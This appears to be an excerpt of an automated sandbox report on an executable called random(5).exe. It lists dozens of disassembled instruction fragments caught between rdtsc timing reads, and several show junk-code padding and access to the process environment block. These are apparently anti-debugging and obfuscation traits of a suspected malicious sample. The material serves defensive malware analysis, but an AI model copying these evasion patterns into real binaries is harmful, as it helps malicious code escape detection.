    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 175DD62 second address: 175DD8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007F519CD4C37Dh 0x0000000b pop ecx 0x0000000c popad 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F519CD4C37Fh 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 175DD8C second address: 175DD9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F519CFC89BEh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17660AD second address: 17660B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1764C4C second address: 1764C51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 176553F second address: 176554B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F519CD4C376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17656EA second address: 17656F8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F519CFC89B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17656F8 second address: 1765723 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F519CD4C37Eh 0x0000000f jnp 00007F519CD4C376h 0x00000015 push edi 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 jns 00007F519CD4C376h 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1765723 second address: 1765729 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1765729 second address: 176573B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jl 00007F519CD4C382h 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17658D5 second address: 17658F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F519CFC89C7h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17658F0 second address: 17658FA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F519CD4C376h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17658FA second address: 1765938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a jmp 00007F519CFC89C1h 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop edi 0x00000012 pushad 0x00000013 jmp 00007F519CFC89BEh 0x00000018 jmp 00007F519CFC89BDh 0x0000001d push eax 0x0000001e pop eax 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1765A8E second address: 1765A94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1765A94 second address: 1765ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F519CFC89B6h 0x0000000a jmp 00007F519CFC89C6h 0x0000000f popad 0x00000010 jo 00007F519CFC89BCh 0x00000016 jl 00007F519CFC89B6h 0x0000001c pushad 0x0000001d jns 00007F519CFC89B6h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1765ACA second address: 1765AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1765C26 second address: 1765C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1765C2C second address: 1765C36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1765D8D second address: 1765DA3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F519CFC89BEh 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1765EF3 second address: 1765EFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F519CD4C376h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1765EFD second address: 1765F41 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F519CFC89C3h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 popad 0x00000011 jc 00007F519CFC89C4h 0x00000017 jmp 00007F519CFC89BCh 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 push edi 0x00000021 pop edi 0x00000022 jmp 00007F519CFC89BDh 0x00000027 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 176AA8E second address: 176AA9A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F519CD4C376h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 176AEC9 second address: 176AED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 176AFF7 second address: 176AFFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 176AFFB second address: 176B007 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F519CFC89B6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 176B007 second address: 176B013 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F519CD4C376h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 176B3D3 second address: 176B3EC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F519CFC89B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007F519CFC89BCh 0x00000010 je 00007F519CFC89B6h 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 176B9B2 second address: 176B9BC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edi 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 176B9BC second address: 176B9D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F519CFC89C2h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 176B9D7 second address: 176B9DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17726D8 second address: 17726F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 jmp 00007F519CFC89BCh 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop ebx 0x0000000e js 00007F519CFC89BEh 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1772C55 second address: 1772C6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C384h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1775F3D second address: 1775F4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F519CFC89B6h 0x0000000a jl 00007F519CFC89B6h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 16EAFF9 second address: 16EB021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F519CD4C381h 0x00000009 jmp 00007F519CD4C383h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1732F84 second address: 1732F9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1732F9E second address: 1732FA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1732FA4 second address: 1732FA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17330E0 second address: 17330E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17330E7 second address: 17330FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 ja 00007F519CFC89B6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 push edi 0x00000013 pop edi 0x00000014 popad 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17330FC second address: 1733102 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 173331D second address: 1733321 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1733321 second address: 173332D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 173332D second address: 1733331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 173342C second address: 1733435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1733435 second address: 1733439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1733439 second address: 17334B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C386h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D28DBh], esi 0x00000011 push 00000004h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F519CD4C378h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D1C26h], ebx 0x00000033 nop 0x00000034 pushad 0x00000035 je 00007F519CD4C37Ch 0x0000003b ja 00007F519CD4C376h 0x00000041 pushad 0x00000042 push edi 0x00000043 pop edi 0x00000044 jmp 00007F519CD4C389h 0x00000049 popad 0x0000004a popad 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17334B9 second address: 17334BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17334BF second address: 17334C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17334C4 second address: 17334CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17334CA second address: 17334CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 173388D second address: 1733891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1733891 second address: 1733895 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 177E906 second address: 177E90C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 177E90C second address: 177E916 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 177E916 second address: 177E91A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 177E91A second address: 177E923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 177E923 second address: 177E936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jng 00007F519CFC89B6h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 177EA9A second address: 177EAAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F519CD4C37Dh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 177EDE3 second address: 177EE08 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F519CFC89B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F519CFC89C4h 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1781632 second address: 178163A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 178163A second address: 1781658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F519CFC89C3h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1902DA1 second address: 1902DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1902DA5 second address: 1902DA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1903216 second address: 1903238 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F519CD4C37Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F519CD4C380h 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1903238 second address: 1903248 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89BCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 19050BD second address: 19050D1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F519CD4C376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 19050D1 second address: 19050D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 19050D7 second address: 19050DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1907C7A second address: 1907C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90008 second address: 6E9001B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E9001B second address: 6E90021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90021 second address: 6E90099 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F519CD4C37Ah 0x00000010 or ch, FFFFFFF8h 0x00000013 jmp 00007F519CD4C37Bh 0x00000018 popfd 0x00000019 mov eax, 43692F2Fh 0x0000001e popad 0x0000001f mov dword ptr [esp], ebp 0x00000022 pushad 0x00000023 push ecx 0x00000024 jmp 00007F519CD4C387h 0x00000029 pop ecx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushfd 0x0000002d jmp 00007F519CD4C37Fh 0x00000032 and ax, 671Eh 0x00000037 jmp 00007F519CD4C389h 0x0000003c popfd 0x0000003d rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90099 second address: 6E900FA instructions: 0x00000000 rdtsc 0x00000002 mov edi, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a movzx esi, di 0x0000000d popad 0x0000000e mov eax, dword ptr fs:[00000030h] 0x00000014 jmp 00007F519CFC89BEh 0x00000019 sub esp, 18h 0x0000001c pushad 0x0000001d mov di, cx 0x00000020 jmp 00007F519CFC89BAh 0x00000025 popad 0x00000026 xchg eax, ebx 0x00000027 pushad 0x00000028 jmp 00007F519CFC89BEh 0x0000002d call 00007F519CFC89C2h 0x00000032 mov ch, 41h 0x00000034 pop ebx 0x00000035 popad 0x00000036 push eax 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a movsx edi, ax 0x0000003d rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E900FA second address: 6E901A0 instructions: 0x00000000 rdtsc 0x00000002 call 00007F519CD4C382h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushfd 0x0000000c jmp 00007F519CD4C37Eh 0x00000011 sbb ecx, 18A88B68h 0x00000017 jmp 00007F519CD4C37Bh 0x0000001c popfd 0x0000001d pop ecx 0x0000001e popad 0x0000001f xchg eax, ebx 0x00000020 pushad 0x00000021 movsx edi, cx 0x00000024 movzx eax, dx 0x00000027 popad 0x00000028 mov ebx, dword ptr [eax+10h] 0x0000002b jmp 00007F519CD4C389h 0x00000030 xchg eax, esi 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F519CD4C37Ch 0x00000038 add eax, 430BE028h 0x0000003e jmp 00007F519CD4C37Bh 0x00000043 popfd 0x00000044 pushad 0x00000045 popad 0x00000046 popad 0x00000047 push eax 0x00000048 jmp 00007F519CD4C381h 0x0000004d xchg eax, esi 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F519CD4C37Dh 0x00000055 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E901A0 second address: 6E901B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F519CFC89BCh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E901B0 second address: 6E9025B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [762C06ECh] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F519CD4C37Dh 0x00000015 jmp 00007F519CD4C37Bh 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007F519CD4C388h 0x00000021 xor cl, 00000078h 0x00000024 jmp 00007F519CD4C37Bh 0x00000029 popfd 0x0000002a popad 0x0000002b test esi, esi 0x0000002d jmp 00007F519CD4C386h 0x00000032 jne 00007F519CD4D1E2h 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b mov ebx, 180B7EF0h 0x00000040 pushfd 0x00000041 jmp 00007F519CD4C389h 0x00000046 and ecx, 1BF8EC76h 0x0000004c jmp 00007F519CD4C381h 0x00000051 popfd 0x00000052 popad 0x00000053 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E9025B second address: 6E902D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F519CFC89C7h 0x00000009 and ax, D1AEh 0x0000000e jmp 00007F519CFC89C9h 0x00000013 popfd 0x00000014 mov cx, 4E37h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, edi 0x0000001c pushad 0x0000001d mov ebx, ecx 0x0000001f pushad 0x00000020 mov ah, A8h 0x00000022 call 00007F519CFC89C7h 0x00000027 pop esi 0x00000028 popad 0x00000029 popad 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F519CFC89C5h 0x00000032 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E902D5 second address: 6E90350 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F519CD4C387h 0x00000009 sbb cx, A27Eh 0x0000000e jmp 00007F519CD4C389h 0x00000013 popfd 0x00000014 mov ch, DCh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, edi 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F519CD4C389h 0x00000021 jmp 00007F519CD4C37Bh 0x00000026 popfd 0x00000027 mov si, E79Fh 0x0000002b popad 0x0000002c call dword ptr [76290B60h] 0x00000032 mov eax, 75A0E5E0h 0x00000037 ret 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b pushad 0x0000003c popad 0x0000003d mov ax, bx 0x00000040 popad 0x00000041 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90350 second address: 6E90356 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90356 second address: 6E9035A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E9035A second address: 6E903B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000044h 0x0000000a pushad 0x0000000b movzx eax, dx 0x0000000e call 00007F519CFC89BFh 0x00000013 movzx esi, di 0x00000016 pop edx 0x00000017 popad 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov edi, 6005C580h 0x00000021 pushfd 0x00000022 jmp 00007F519CFC89C9h 0x00000027 adc cx, 7386h 0x0000002c jmp 00007F519CFC89C1h 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E903B7 second address: 6E903BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E903BD second address: 6E903C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
